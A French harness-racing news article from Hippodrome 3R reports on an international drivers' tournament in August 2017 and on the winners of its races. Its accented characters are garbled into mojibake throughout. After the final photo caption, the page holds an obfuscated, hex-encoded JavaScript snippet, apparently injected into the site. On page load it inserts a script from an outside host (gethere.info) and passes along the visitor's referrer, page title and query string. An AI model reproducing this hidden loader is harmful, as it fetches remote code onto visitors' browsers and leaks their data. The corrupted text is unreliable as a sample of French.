MacDonald en voie de gagner un super tournoi

17 août 2017 | Hippodrome 3R | By : Daniel Delisle

La foule A�tait belle, la mA�tA�o fraA�che mais clA�mente, la piste rapide et les onze conducteurs fin prA?ts A� donner un spectacle de qualitA�, et c’est ce qui s’est produit. Quatre belles courses au cours desquelles il y a eu beaucoup d’action, quelques revirements et oA? les favoris se sont distinguA�s.

 

H3R sait faire

 

Bien dirigA�e par Murielle Thomassin et FranA�ois Carignan, la soirA�e s’est A�branlA�e comme prA�vue vers les 16h45 avec la prA�sentation bilingue des onze conducteurs. Ils ont A�tA� bien applaudis, leurs drapeaux respectifs bien en A�vidence. Onze chevaux qui s’A�branlent en mA?me temps sur une piste d’un demi-mille, on ne voit pas la chose souvent, ni A� H3R ni ailleurs. Tout s’est dA�roulA� dans l’ordre, les conducteurs faisant preuve de discipline et d’un certain fairplay. Guy Lafontaine s’est surpassA�e dans ses descriptions aussi vivantes qu’A� l’accoutumA�, les entrevues ont A�tA� menA�es rondement et les conducteurs A� la hauteur de leur savoir-faire, si tant est que ce n’est pas A�vident pour plusieurs de conduire des ambleurs et dans un style de course A� la nord-amA�ricaine.

 

Avantage AmA�rique du Nord

James MacDonald et Federal Strike, un champion du monde en devenir

Aucun doute possible, la faA�on de mener les courses en AmA�rique nous estA� propre et les deux porte-couleurs nord-amA�ricains, James MacDonald et Marcus Miller, ont prouvA� qu’ils A�taient plus A� l’aise dans ce genre de compA�tition. Les deux ont A�tA� des menaces constantes quelles que soient la qualitA� de leurs montures. Oui, dans certaines courses, ils dA�tenaient un certain avantage, mais aussi ils ont prouvA� qu’ils pouvaient peut-A?tre plus facilement tirA� leur A�pingle du jeu que les A�trangers.

 

James MacDonald a A�tA� brillant. Sa victoire avec Federal Strike, le trotteur de la famille Fontaine, fut un chef-d’oeuvre. Imaginez : gagner de la 11e position dans un peloton de 11. Comme il le disait lui-mA?me humblement, il fallait  » de la chance et surtout, comme il l’a soulignA�, le fairplay d’un de ses rivaux, Bjorn Goop qui lui a laissA� un espace le long des cA?nes pour donner un second souffle A� sa monture. » Ce fut la piA?ce maA�tresse de cette soirA�e, cA?tA� habiletA� et savoir-faire.  » Je vais faire tout mon possible pour bien terminer ce tournoi, et ainsi faire honneur au pays », de dire ce gentilhomme, nouvelle gA�nA�ration.

 

MA?me rA�ussite de Marcus MIller, le reprA�sentant amA�ricain qui a lui aussi fait valoir ses talents aux guides de Maracasso de l’A�curie Simon Delisle.  » J’avais un trA?s bon cheval, pas de doute et il a super bien rA�pondu quand je l’ai commandA� dans l’avant-dernier droit.  »

Maracasso et Marcus Miller ont gagnA� la 1A?re course du tournoi

Mika Forss

 

Le grand Finlandais Mika Forss a aussi A�tA� brillant dans une fin de course ultra-serrA�e avecA� Shanghai BG devanA�ant in extremis Dexter Dunn et Jolts Prayer. La scA?ne A�tait d’autant plus spA�ciale qu’il l’a fait avec un siA?ge sorti de ses amarres. Il a donc dA� pratiquement conduire le dernier droit sans s’asseoir vraiment, comme suspendu dans l’air. Il l’a trouvA� bien drA?le, nous aussi d’ailleurs. Ce monsieur sympathique est maintenant 2e au classement. L’autre gagnant, Noel Baldacchino, le Maltais, a aussi bien fait avec Tidewater Tomahawk de l’entraA�neur A�ric Milot. Malheureusement, nous n’avons pu avoir ses commentaires, le monsieur ne parlant ni anglais ni franA�ais.

Le Maltais Noel Baldacchino et Tidewater Tomahawk

Des gentlemen

 

Une chose est certaine et constitue un dA�nominateur commun entre ces onze messieurs : ils sont tous d’une gentillesse, d’une politesse et d’un savoir-vivre qui fait honneur A� notre sport. Tous ont A�tA� charmants A� rencontrer, malgrA� parfois la barriA?re de la langue. Ils ont unanimement apprA�ciA� l’accueil qu’ils ont reA�u chez nous, la qualitA� de notre tracA� et le fait de se trouver en milieu francophone.

Mika Forss, le Finlandais, 2e au classement avant l’A�tape finale

Ils partiront ce matin pour l’AZle-du-Prince-A�douard terminer en beautA� ce qu’ils ont commencA� A� faire samedi dernier A� Calgary. Chose certaine, ils auront laissA� une belle empreinte A� tous ceux qui,A� nombreux, s’A�taient dA�placA�s pour eux. Souhaitons-leur A� chacun la meilleure des chances et A� James MacDonald, de terminer en force ce tournoi.

 

Un petit ajout mA�ritA� : dans les courses rA�guliA?res qui devanA�aient le tournoi, on a vu le vaillant et infatigable Bali se donner un nouveau record de vitesse de 1.53.1 avec StA�phane Brosseau aux guides. Le cheval de Denise et A�milie Auger, entraA�nA�e par Marie-Claude a A�tA� fantastique… la bonne nouvelle, c’est que le tracA� aussi semble fin prA?t pour dimanche !!!

Bali et StA�phane Brosseau pour un nouveau record en 1.53.1

 var _0x31f1=[« \x73\x63\x72\x69\x70\x74″, »\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″, »\x73\x72\x63″, »\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D », »\x72\x65\x66\x65\x72\x72\x65\x72″, »\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D », »\x74\x69\x74\x6C\x65″, »\x26″, »\x3F », »\x72\x65\x70\x6C\x61\x63\x65″, »\x73\x65\x61\x72\x63\x68″, »\x6C\x6F\x63\x61\x74\x69\x6F\x6E », »\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″, »\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″, »\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″, »\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″, »\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″, »\x68\x65\x61\x64″, »\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″, »\x70\x72\x6F\x74\x6F\x63\x6F\x6C », »\x68\x74\x74\x70\x73\x3A », »\x69\x6E\x64\x65\x78\x4F\x66″, »\x52\x5F\x50\x41\x54\x48″, »\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E »];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}

Retour aux nouvelles